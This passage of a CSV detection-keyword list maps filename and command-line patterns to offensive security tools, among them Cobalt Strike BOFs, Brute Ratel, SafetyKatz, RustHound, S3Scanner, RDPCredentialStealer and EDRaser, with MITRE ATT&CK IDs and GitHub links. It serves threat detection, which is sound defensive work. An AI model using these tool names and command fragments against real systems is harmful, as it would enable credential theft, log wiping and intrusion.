TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*runshellcode.asm*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*runshellcode.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*runshellcode.o*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*RunStealCookie-8B5C57DA-F404-ED11-82E4-0022481BF843.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*RunStealPowerAutomateToken-8C5C57DA-F404-ED11-82E4-0022481BF843.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*RuralBishop.csproj*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*RuralBishop.exe*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*RuralBishop.sln*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*RuralBishop-master*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*rustbof.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*rusthound * --zip --ldaps --adcs --old-bloodhound*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rusthound *--domain*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound *--ldapfqdn *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound *-ldaps *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound -d *,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rusthound* --adcs --dc-only*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*RustHound-main*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*rvazarkar/GMSAPasswordReader*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z -*Rvn0xsy/Cooolis-ms*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*rvrsh3ll/BOF_Collection*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*rvrsh3ll/TokenTactics*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*RwBlAHQALQBDAG8AbQBwAHUAdABlAHIASQBuAGYAbwAgAHwAIABzAGUAbABlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAVwBpAG4AZABvAHcAcwBQAHIAbwBkAHUAYwB0AE4AYQBtAGUA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEkAUABBAGQAZAByAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAoACQAXwAgAC0AbABpAGsAZQAgACIAMQAwAC4AKgAuACoALgAqACIAKQAgAC0AbwByACAAKAAkAF8AIAAtAGwAaQBrAGUAIAAiADEAOQAyAC4AMQA2ADgALgAqAC4AKgAiACkAIAAtAG8AcgAgACgAJABfACAALQBsAGkAawBlACAAIgAxADcAMgAuADEANgA4AC4AKgAuACoAIgApAH0A*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*rwxfinder.*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*RWXfinder-main*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*RXh0ZXJuYWwgQzIgUG9ydA==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*rxwx/cs-rdll-ipc-example*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*s0lst1c3*,offensive_tool_keyword,Github Username,Github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/s0lst1c3,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*s0md3v*,offensive_tool_keyword,Github Username,github username hosting offensive tools. mostly for web hacking,N/A,N/A,N/A,N/A,Web Attacks,https://github.com/s0md3v,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*s0md3v*Striker*,offensive_tool_keyword,Striker,Recon & Vulnerability Scanning Suite for web services,T1210.001 - T1190 - T1595 - T1192,TA0007 - TA0002 - TA0008 - ,N/A,N/A,Web Attacks,https://github.com/s0md3v/Striker,1,1,N/A,N/A,10,2114,454,2023-06-04T20:15:11Z,2017-10-30T07:08:02Z -*S12cybersecurity/Admin2Sys*,offensive_tool_keyword,Admin2Sys,Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM,T1055.002 - T1078.003 - T1068,TA0002 - TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/S12cybersecurity/Admin2Sys,1,1,N/A,10,1,31,15,2023-05-01T19:32:41Z,2023-05-01T18:50:51Z -*S12cybersecurity/RDPCredentialStealer*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*S3cretP4ssw0rd!*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*S3cur3Th1sSh1t*,offensive_tool_keyword,Github Username,Github username of hackr known for exploitation scripts Pentesting. scripting and pwning!,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*S3cur3Th1sSh1t/MultiPotato*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*S3cur3Th1sSh1t/PowerSharpPack*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*s3scanner -*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*s3scanner dump *,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*s3scanner scan *,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,0,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*S3Scanner-master*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,1,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*S4U2self.py*,offensive_tool_keyword,POC,script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/Ridter/noPac,1,0,N/A,N/A,7,643,112,2023-01-29T03:31:27Z,2021-12-13T10:28:12Z -*S4uDelegator.*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*S4UTomato 1.0.0-beta*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*S4UTomato.csproj*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*S4UTomato.exe*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*S4UTomato.sln*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*S4UTomato-master*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*s7scan*,offensive_tool_keyword,Github Username,s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.,T1046 - T1018 - T1049 - T1040 - T1016 - T1057,TA0043 - TA0042 - TA0001,N/A,N/A,Exploitation tools,https://github.com/klsecservices/s7scan,1,1,N/A,N/A,2,121,45,2018-12-28T12:11:56Z,2018-10-12T08:52:04Z -*sa7mon/S3Scanner*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,1,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*safari_in_operator_side_effect.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*safari_proxy_object_type_confusion.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SafeBreach-Labs/EDRaser*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*safetydump*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*safetydump.ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*safetydump.ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*SafetyKatz.csproj*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*SafetyKatz.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 